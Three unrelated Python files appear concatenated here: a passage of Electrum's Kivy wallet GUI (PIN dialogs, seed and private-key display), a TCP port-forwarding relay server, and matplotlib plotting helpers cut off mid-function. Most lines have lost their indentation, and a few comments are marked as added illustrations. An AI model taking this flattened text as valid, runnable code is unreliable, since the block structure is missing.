self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
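        # Illustrative usage (not from the original code):
        #   self.show_info_bubble(text=_('Copied'), duration=2, arrow_pos=None)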
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
tcp_forwarding_multi_server.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2022, Vm, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.cub@gmail.com>
import time
import socket
import struct
import argparse
import threading
from forwarding import logger, create_tcp_socket_server, create_tcp_socket_client, Forwarding
class TcpForwardingMultiServer(threading.Thread):
def __init__(self, bind_addr):
super().__init__()
self.daemon = True
self._bind_addr = bind_addr
self.alive = True
self._addr_sockserver_map = {}
@staticmethod
def _unpack_verify_data(data):
try:
if not data or len(data) < 35:
return None, ''
# '<UVM>{HOST}{PORT}{UNIQUE_ID}</UVM>'
# TODO check data is legal
uvm_begin, host, port, unique_id, uvm_end = struct.unpack('<5s4si16s6s', data)
if uvm_begin != b'<UVM>' or uvm_end != b'</UVM>':
return None, ''
addr = (socket.inet_ntoa(host), port)
return addr, unique_id.decode('utf-8')
except Exception as e:
return None, ''
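    # Illustrative only: a client announcing host 192.168.1.10 and port 502 together with a
    # 16-byte unique id would build the 35-byte message this method expects roughly as:
    #   struct.pack('<5s4si16s6s', b'<UVM>', socket.inet_aton('192.168.1.10'), 502,
    #               b'0123456789abcdef', b'</UVM>')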
def _forwarding_thread(self, sock):
sock.settimeout(10)
sock.setblocking(True)
try:
data = sock.recv(35)
addr, unique_id = self._unpack_verify_data(data)
if not addr:
logger.error('verify failed, {}'.format(data))
sock.close()
return
logger.info('addr: {}, unique_id: {}'.format(addr, unique_id))
addr_str = '{}:{}'.format(addr[0], addr[1])
if addr_str in self._addr_sockserver_map:
client, server = self._addr_sockserver_map[addr_str]
try:
client.close()
except:
pass
try:
server.shutdown(socket.SHUT_RDWR)
server.close()
except:
pass
self._addr_sockserver_map.pop(addr_str, None)
time.sleep(1)
sock_server = create_tcp_socket_server(addr)
if not sock_server:
sock.close()
return
self._addr_sockserver_map[addr_str] = [sock, sock_server]
logger.info('Wait for client connect {}'.format(addr))
sock_in, addr_in = sock_server.accept()
sock_server.close()
self._addr_sockserver_map.pop(addr_str, None)
sock.send(b'<UVM>OK</UVM>')
forward = Forwarding(sock_in, sock)
forward.join()
except Exception as e:
logger.error('forwarding_thread exception, {}'.format(e))
def run(self):
logger.info('TcpForwardingMultiServer({}) Start'.format(self._bind_addr))
sock_server = create_tcp_socket_server(self._bind_addr)
if not sock_server:
logger.info('TcpForwardingMultiServer({}) over'.format(self._bind_addr))
return
while self.alive:
logger.info('Wait for tcp_forwarding_multi_client connect {}'.format(self._bind_addr))
sock_out, addr_out = sock_server.accept()
t = threading.Thread(target=self._forwarding_thread, args=(sock_out,), daemon=True)
t.start()
logger.info('TcpForwardingMultiServer({}) over'.format(self._bind_addr))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bind_host', type=str, default='0.0.0.0')
parser.add_argument('--bind_port', type=int, default=33333)
args = parser.parse_args()
forwarding = TcpForwardingMultiServer((args.bind_host, args.bind_port))
forwarding.start()
while True:
time.sleep(1)
|
plotter.py
|
import numpy as np
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import gridspec
from matplotlib import colors
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D # noqa: F401 unused import
import networkx as nx
import multiprocessing as mp
import pickle # used to save data (as class object)
import imageio # Used for making gifs of the network plots
import os # Used for putting the gifs somewhere
from pathlib import Path # used for file path compatibility between operating systems
import time
import utility_funcs
# Single Graph Properties: ------------------------------------------------------------------------------------------
def plot_ave_node_values(graph, individually=False, show=True, save_fig=False, title=None):
"""
Graphs nodes values over the course of a single graph's history.
:param individually: set to True to graph all nodes' values independently
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
plt.plot(graph.nodes[:-1].sum(axis=1) / (graph.nodes.shape[1]))
plt.title(f'Sum Node values as % of possible')
plt.xlabel('Time step')
plt.ylabel(f'Information diffused')
if individually:
plt.plot(graph.nodes[:-1].mean(axis=1))
plt.title(f'Average node values')
plt.xlabel('Time step')
plt.ylabel(f'Average node values')
if save_fig:
plt.savefig(f'Ave_Node_Values {graph.nodes.shape[0]} runs.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_eff_dist(graph, all_to_all=False, difference=False, fit=False, normalized=True, show=False, save_fig=False, title=None,
source_reward=2.6, delta=1, MPED=False):
"""
:param all_to_all: If True, the effective distance plotted through time disregards the source and instead averages the all-to-all effective distance.
:param fit: Allows for linear and averaging interpolations alongside the bare data.
:param normalized: Normalizes the y axis if set to True.
The following parameters are only relevant for all_to_all=True effective distance calculations; the defaults strongly suppress higher-order paths:
:param source_reward:
:param delta:
:param MPED:
"""
assert show or save_fig or title, 'Effective Distance Graph will be neither shown nor saved'
fig = plt.figure(figsize=(12, 6))
if difference:
mean_eff_dist_history = graph.get_eff_dist(all_to_all_eff_dist=all_to_all, overall_average=False, MPED=MPED, source_reward=source_reward, delta=delta)
# mean_eff_dist_history = graph.get_eff_dist(graph.A[-1], multiple_path=MPED, parameter=delta) - graph.get_eff_dist(graph.A[0], multiple_path=MPED, parameter=delta)
elif all_to_all:
mean_eff_dist_history = np.array([graph.evaluate_effective_distances(source_reward=source_reward, parameter=delta, multiple_path_eff_dist=MPED, source=None, timestep=t) for t in range(graph.A.shape[0])])
mean_eff_dist_history = np.mean(np.mean(mean_eff_dist_history, axis=1), axis=1)
# mean_eff_dist_history = np.mean(graph.evaluate_effective_distances(source_reward=source_reward, parameter=delta, multiple_path_eff_dist=MPED, source=None, timestep=-1))
else:
mean_eff_dist_history = np.mean(graph.eff_dist_to_source_history, axis=1)
x = np.array(range(len(mean_eff_dist_history)))
if normalized:
y = np.array(mean_eff_dist_history) / np.amax(mean_eff_dist_history)
else:
y = mean_eff_dist_history
plt.plot(x, y)
if all_to_all:
plt.title(f'All-to-All Effective Distance history')
else:
plt.title(f'Effective Distance history')
plt.xlabel('Time step')
plt.ylabel(f'Effective distance')
if fit:
if fit == 'log':
# log_fit = np.polyfit(np.log(x), y, 1, w=np.sqrt(y))
# plt.plot(x, np.exp(log_fit[1])*np.exp(log_fit[0]*x))
# a, b = optimize.curve_fit(lambda t, a, b: a * np.exp(b * t), x, y, p0=(1, 0.5))
# plt.plot(x, a[0] * np.exp(a[1] * x))
print("Logarithmic/exponential fitting encounters inf/NaN errors in regression :(")
if fit == 'linear':
linear_fit = np.polyfit(x, y, 1, w=np.sqrt(y))
plt.plot(x, linear_fit[0]*x + linear_fit[1])
if fit == 'average':
ave_range = int(len(y)/20)
assert ave_range % 2 == 0, 'Average range must be even (at least, for this algorithm). Default range is ave_range = int(len(y)/20)'
half_range = int((ave_range/2))
averaging_fit = [np.mean(y[index-half_range:index+half_range]) for index in x[half_range:-half_range]]
plt.plot(averaging_fit)
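            # Worked example (illustrative): for len(y) == 200, ave_range == 10 and
            # half_range == 5; the first fitted value (at index 5) is mean(y[0:10]),
            # i.e. a centered moving average over a window of ave_range points.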
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if save_fig:
plt.savefig(f'Effective_Distance for edge_to_eff_dist_coupling of {graph.edge_conservation_coefficient}.png')
plt.close(fig)
def plot_node_values(graph, node='all', show=False, save_fig=False, title=None):
"""
Plots node values over the course of the graph's run history.
:param node: set to 'all' to graph all node values simultaneously, else select intended node index (< num_nodes)
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
if node == 'all':
plt.plot(graph.nodes)
plt.title(f'All nodes\' values')
plt.xlabel('Time step')
plt.ylabel(f'Nodes values') # reveals it generally gets all the information!
else:
plt.plot(graph.nodes[:-2, node])
plt.title(f'{node}\'th Node\'s values')
plt.xlabel('Time step')
plt.ylabel(f'{node}th node\'s values') # reveals it generally gets all the information!
if save_fig:
plt.savefig(f'{node} node_values with edge_to_eff_dist_coupling of {np.round(graph.edge_conservation_coefficient, 2)} and {graph.nodes.shape[0]} runs.png')
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
if show:
plt.show()
def plot_node_edges(graph, node, show=False, save_fig=False, title=None):
"""
Graphs node's edges values.
:param node: node index whose edges are to be graphed over time.
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
plt.plot(graph.A[:, :, node])
plt.title(f'Node Edges')
plt.xlabel('Timestep')
plt.ylabel(f'{node}th node\'s incoming edge values')
if save_fig:
plt.savefig(f'Edge values of {node} node for {graph.A.shape[0]} runs.png')
if show:
plt.show()
if title:
plt.savefig(f'{title}.png')
plt.close(fig)
def plot_edge_sum(graph, node=None, standard_deviation=False, incoming_edges=False, show=False, save_fig=False, title=None):
"""
:param node: index of the node to be examined. If None (the default), edge sums/stds are plotted for all nodes.
:param standard_deviation: determines if graphing standard deviations rather than sums
:param incoming_edges: if True, considers incoming rather than outgoing edges, which are by default normalized.
# incoming edge sum only relevant if they are not normalized
"""
assert show or save_fig or title, 'Graph will be neither shown nor saved'
fig = plt.figure(figsize=(10, 4))
if standard_deviation:
edge_std_for_all_nodes = np.zeros((graph.num_nodes, graph.A[:, 0, 0].size))
for Node in range(0,
graph.A[0][-1].size): # evaluates standard deviations, Node capitalized to distinguish scope
edge_std_for_all_nodes[Node] = np.std(graph.A[:, Node], axis=1)
# edge_std_for_all_nodes[Node] = [edge_values.std() for edge_values in graph.A[:, Node][:]] # less efficient?
if node or node == 0:
